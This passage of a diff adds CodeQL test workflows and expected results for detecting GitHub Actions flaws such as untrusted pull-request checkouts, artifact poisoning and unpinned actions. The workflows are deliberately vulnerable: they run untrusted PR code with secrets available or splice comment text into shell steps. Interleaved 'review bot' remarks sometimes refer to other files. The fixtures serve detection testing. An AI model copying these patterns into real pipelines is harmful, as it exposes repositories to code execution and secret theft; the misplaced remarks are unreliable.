+ outputs:
+ version-json: ${{ steps.show_versions.outputs.version-json }}
+ steps:
+ - name: 'Download artifact'
+ uses: actions/github-script@v3.1.0
+ with:
+ script: |
+ var artifacts = await github.actions.listWorkflowRunArtifacts({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ run_id: ${{ github.event.workflow_run.id }},
+ });
+ var matchArtifactNacos = artifacts.data.artifacts.filter((artifact) => {
+ return artifact.name == "nacos"
+ })[0];
+ var download = await github.actions.downloadArtifact({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ artifact_id: matchArtifactNacos.id,
+ archive_format: 'zip',
+ });
+ var fs = require('fs');
+ fs.writeFileSync('${{github.workspace}}/nacos.zip', Buffer.from(download.data));
+ - run: |
+ unzip nacos.zip
+ mkdir nacos
+ cp -r nacos-* nacos/
+ - name: save docker_2 images
+ run: |
+ mv ./build_backup/* nacos-e2e/cicd/build/
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml
new file mode 100644
index 000000000000..7a346a897e45
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml
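Review bot: The `test3` job checks out `refs/pull/${{ github.event.number }}/merge`, but on the `issue_comment` event this file is triggered by there is no top-level `number` in the payload; the PR number lives at `github.event.issue.number`, which `test1` and `test2` already read as `context.payload.issue.number`. The ref therefore expands to `refs/pull//merge` and the checkout cannot succeed, so the line should be `ref: "refs/pull/${{ github.event.issue.number }}/merge"`.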
@@ -0,0 +1,60 @@
+name: Benchmark
+
+on:
+ issue_comment:
+ types: [created]
+
+env:
+ TURBO_TOKEN: ${{ secrets.TURBO_TOKEN }}
+ TURBO_TEAM: ${{ secrets.TURBO_TEAM }}
+ FORCE_COLOR: true
+
+jobs:
+ benchmark:
+ if: ${{ github.repository_owner == 'foo' && github.event.issue.pull_request && startsWith(github.event.comment.body, '!bench') }}
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ persist-credentials: false
+ ref: refs/pull/${{ github.event.issue.number }}/head
+
+ - name: Setup PNPM
+ uses: pnpm/action-setup@v3
+
+ - name: Setup Node
+ uses: actions/setup-node@v4
+ with:
+ node-version: 18
+ cache: "pnpm"
+
+ - name: Install dependencies
+ run: pnpm install
+
+ - name: Build Packages
+ run: pnpm run build
+
+ - name: Get bench command
+ id: bench-command
+ env:
+ # protects from untrusted user input and command injection
+ COMMENT: ${{ github.event.comment.body }}
+ run: |
+ benchcmd=$(echo "$COMMENT" | grep '!bench' | awk -F ' ' '{print $2}')
+ echo "bench=$benchcmd" >> $GITHUB_OUTPUT
+ shell: bash
+
+ - name: Run benchmark
+ id: benchmark-pr
+ run: |
+ result=$(pnpm run --silent benchmark ${{ steps.bench-command.outputs.bench }})
+ processed=$(node ./benchmark/ci-helper.js "$result")
+ echo "BENCH_RESULT<> $GITHUB_OUTPUT
+ echo "### PR Benchmark" >> $GITHUB_OUTPUT
+ echo "$processed" >> $GITHUB_OUTPUT
+ echo "BENCHEOF" >> $GITHUB_OUTPUT
+ shell: bash
+ - run: python2.7 foo.py
+ - run: pip install --no-deps .
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml
new file mode 100644
index 000000000000..381cc16a6d16
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml
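Review bot: `echo "BENCH_RESULT<> $GITHUB_OUTPUT` in the `benchmark-pr` step is not a valid heredoc opener and leaves an unterminated double quote; the `echo "BENCHEOF" >> $GITHUB_OUTPUT` three lines later suggests the intended line is `echo "BENCH_RESULT<<BENCHEOF" >> $GITHUB_OUTPUT`. This may be an artifact of how the page was rendered rather than the committed file, so the file itself is worth checking. Separately, the `run` line above it interpolates `${{ steps.bench-command.outputs.bench }}` straight into the shell, which reintroduces the comment-derived text that the `COMMENT` env indirection in the previous step was added to keep out of the script; routing that output through `env:` in the same way would make the step consistent with its own comment.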
@@ -0,0 +1,44 @@
+name: OpenAPI
+on:
+ push:
+ branches:
+ - master
+ tags:
+ - 'v*'
+ pull_request_target:
+
+permissions: {}
+
+jobs:
+
+ openapi-base:
+ name: OpenAPI - BASE
+ if: ${{ github.base_ref != '' }}
+ runs-on: ubuntu-latest
+ permissions: read-all
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ fetch-depth: 0
+ - name: Generate openapi.json
+ run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests"
+
+ publish-unstable:
+ name: OpenAPI - Publish Unstable Spec
+ if: ${{ github.event_name != 'pull_request_target' && !startsWith(github.ref, 'refs/tags/v') && contains(github.repository_owner, 'jellyfin') }}
+ runs-on: ubuntu-latest
+ needs:
+ - openapi-base
+ steps:
+ - name: Upload openapi.json (unstable) to repository server
+ uses: appleboy/scp-action@917f8b81dfc1ccd331fef9e2d61bdc6c8be94634 # v0.1.7
+ with:
+ host: "${{ secrets.REPO_HOST }}"
+ username: "${{ secrets.REPO_USER }}"
+ key: "${{ secrets.REPO_KEY }}"
+ source: openapi-head/openapi.json
+ strip_components: 1
+ target: "/srv/incoming/openapi/unstable/jellyfin-openapi-${{ env.JELLYFIN_VERSION }}"
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml
new file mode 100644
index 000000000000..6f7ff665be3b
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml
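Review bot: `${{ env.JELLYFIN_VERSION }}` in the `target:` of the `publish-unstable` job refers to an environment variable that is defined nowhere in this file (there is no `env:` block at workflow, job or step level), so the upload path would end in a bare `jellyfin-openapi-`. If the fixture only needs a realistic-looking `scp-action` step, a job-level `env:` / `JELLYFIN_VERSION: <placeholder-version>` would make it self-contained; if the dangling reference is deliberate, a comment saying so would help.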
@@ -0,0 +1,18 @@
+name: OpenAPI
+on:
+ pull_request_target:
+
+permissions: {}
+
+jobs:
+ base:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ fetch-depth: 0
+ - run:
+ sed -f script/config foo.md > bar.md
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml
new file mode 100644
index 000000000000..992686fb5aa8
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml
@@ -0,0 +1,11 @@
+on:
+ pull_request
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: foo/bar
+ - uses: foo/bar@v1
+ - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml
new file mode 100644
index 000000000000..15d4813c40e9
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml
@@ -0,0 +1,32 @@
+on:
+ pull_request_target:
+
+jobs:
+ test1:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - name: Setup Node.js
+ uses: actions/setup-node@v4
+ with:
+ node-version: 21
+ - run: |
+ npm install
+ npm run lint
+ test2:
+ runs-on: ubuntu-latest
+ env:
+ HEAD: ${{ github.event.pull_request.head.sha }}
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ env.HEAD }}
+ - name: Setup Node.js
+ uses: actions/setup-node@v4
+ with:
+ node-version: 21
+ - run: |
+ npm install
+ npm run lint
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml
new file mode 100644
index 000000000000..47a0dfc6bd34
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml
@@ -0,0 +1,19 @@
+on: issue_comment
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Get PR number
+ id: pr_number
+ if: github.event_name == 'issue_comment' && github.repository_owner == 'foo'
+ run: |
+ PR_URL="${{ github.event.issue.pull_request.url }}"
+ PR_NUMBER=${PR_URL##*/}
+ echo "number=$PR_NUMBER" >> $GITHUB_OUTPUT
+ - name: Checkout Pull Request
+ if: github.event_name == 'issue_comment'
+ env:
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ run: |
+ gh pr checkout ${{ needs.should_run_it.outputs.pr_number }}
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml
new file mode 100644
index 000000000000..0a38be8b12be
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml
@@ -0,0 +1,13 @@
+name: Test
+on:
+
+ workflow_run:
+ workflows: [Trigger]
+ types: [completed]
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: ./.github/actions/dangerous-git-checkout
+ - run: yarn test
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml
new file mode 100644
index 000000000000..7e154502c139
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml
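Review bot: `gh pr checkout ${{ needs.should_run_it.outputs.pr_number }}` in untrusted_checkout2.yml references a job `should_run_it` that does not exist in this workflow, and the `build` job has no `needs:`, so the expression expands to an empty string; meanwhile the `pr_number` step computes exactly this value and writes it to `number`, which nothing reads. The step should consume its sibling's output, preferably without splicing it into the script: `env:` / `PR_NUMBER: ${{ steps.pr_number.outputs.number }}` alongside `GITHUB_TOKEN`, and `gh pr checkout "$PR_NUMBER"`. The two steps also gate on different conditions (`repository_owner == 'foo'` only on the first), which may be intentional for the query but deserves a comment.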
@@ -0,0 +1,51 @@
+on:
+ issue_comment:
+ types: [created, edited]
+
+jobs:
+ build:
+ if: ${{ github.event.issue.pull_request }} && contains(github.event.comment.body, '/version')
+ runs-on: ubuntu-latest
+
+ steps:
+ - name: Get PR details
+ uses: actions/github-script@v6
+ id: get-pr
+ with:
+ script: |
+ const request = {
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ pull_number: context.issue.number
+ }
+ core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`)
+ try {
+ const result = await github.rest.pulls.get(request)
+ return result.data
+ } catch (err) {
+ core.setFailed(`Request failed with error ${err}`)
+ }
+
+ - name: Checkout PR
+ uses: actions/checkout@v3
+ with:
+ repository: ${{ fromJSON(steps.get-pr.outputs.result).head.repo.full_name }}
+ ref: ${{ fromJSON(steps.get-pr.outputs.result).head.ref }}
+
+ - name: Update version minor
+ if: contains(github.event.comment.body, '/version minor')
+ run: |
+ ./version.sh -u -n
+ echo "BUMP_TYPE=minor" >> $GITHUB_ENV
+
+ - name: Update version major
+ if: contains(github.event.comment.body, '/version major')
+ run: |
+ ./version.sh -u -m
+ echo "BUMP_TYPE=major" >> $GITHUB_ENV
+
+ - name: Update version patch
+ if: contains(github.event.comment.body, '/version patch')
+ run: |
+ ./version.sh -u -p
+ echo "BUMP_TYPE=patch" >> $GITHUB_ENV
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml
new file mode 100644
index 000000000000..b98d76549986
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml
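Review bot: The job-level condition `if: ${{ github.event.issue.pull_request }} && contains(github.event.comment.body, '/version')` mixes an interpolated `${{ }}` fragment with bare expression syntax; the runner evaluates the `${{ }}` part first and is left with a string rather than the intended boolean conjunction, so the second clause may not gate the job at all. Wrapping the whole condition removes the ambiguity: `if: ${{ github.event.issue.pull_request && contains(github.event.comment.body, '/version') }}`. If the fixture relies on the odd form for the query, a comment should say so.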
@@ -0,0 +1,23 @@
+on:
+ pull_request_target
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ if: github.repository_owner == 'foo'
+ env:
+ HEAD: ${{ github.event.pull_request.head.sha }}
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ env.HEAD }}
+ - name: Setup Node.js
+ uses: actions/setup-node@v4
+ with:
+ node-version: 21
+ - run: |
+ npm install
+ npm run lint
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml
new file mode 100644
index 000000000000..037a0eb79f95
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml
@@ -0,0 +1,23 @@
+on:
+ pull_request_target
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ if: github.event.pull_request.head.repo.full_name == github.repository
+ env:
+ HEAD: ${{ github.event.pull_request.head.sha }}
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ env.HEAD }}
+ - name: Setup Node.js
+ uses: actions/setup-node@v4
+ with:
+ node-version: 21
+ - run: |
+ npm install
+ npm run lint
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml
new file mode 100644
index 000000000000..c802355d102a
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml
@@ -0,0 +1,19 @@
+on:
+ workflow_run:
+ workflows: ['Test']
+ types: [completed]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ if: github.event.workflow_run.conclusion == "success"
+ env:
+ HEAD: ${{ github.event.workflow_run.head.sha }}
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.workflow_run.head.sha }}
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ env.HEAD }}
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml
new file mode 100644
index 000000000000..bcde60f55cb8
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml
@@ -0,0 +1,19 @@
+on:
+ workflow_run:
+ workflows: ['Test']
+ types: [completed]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ if: github.event.workflow_run.conclusion == "success" && github.repository_owner == 'foo'
+ env:
+ HEAD: ${{ github.event.workflow_run.head.sha }}
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.workflow_run.head.sha }}
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ env.HEAD }}
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml
new file mode 100644
index 000000000000..55aa0b41c6c7
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml
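Review bot: `if: github.event.workflow_run.conclusion == "success"` in workflow_run_untrusted_checkout.yml uses double quotes for a string literal, but GitHub Actions expressions only accept single-quoted strings, so the condition fails to parse and the workflow is rejected rather than gated. The line should read `if: github.event.workflow_run.conclusion == 'success'`. The same double-quoted literal appears in workflow_run_untrusted_checkout_2.yml (same line of this page) and workflow_run_untrusted_checkout_3.yml (next line), where the rest of each condition already uses single quotes.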
@@ -0,0 +1,19 @@
+on:
+ workflow_run:
+ workflows: ['Test']
+ types: [completed]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ if: github.event.workflow_run.conclusion == "success" && github.event.workflow_run.head_repository.full_name == github.repository
+ env:
+ HEAD: ${{ github.event.workflow_run.head.sha }}
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.workflow_run.head.sha }}
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ env.HEAD }}
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
new file mode 100644
index 000000000000..aa0057d60a1b
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
@@ -0,0 +1,71 @@ +edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | Config | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | Config | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | Config | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | 
provenance | Config | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | provenance | Config | +nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | semmle.label | python foo/x.py | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | semmle.label | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | semmle.label | sh cmd | +| 
.github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | semmle.label | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | 
PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | +subpaths +#select +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | python foo/x.py | .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). 
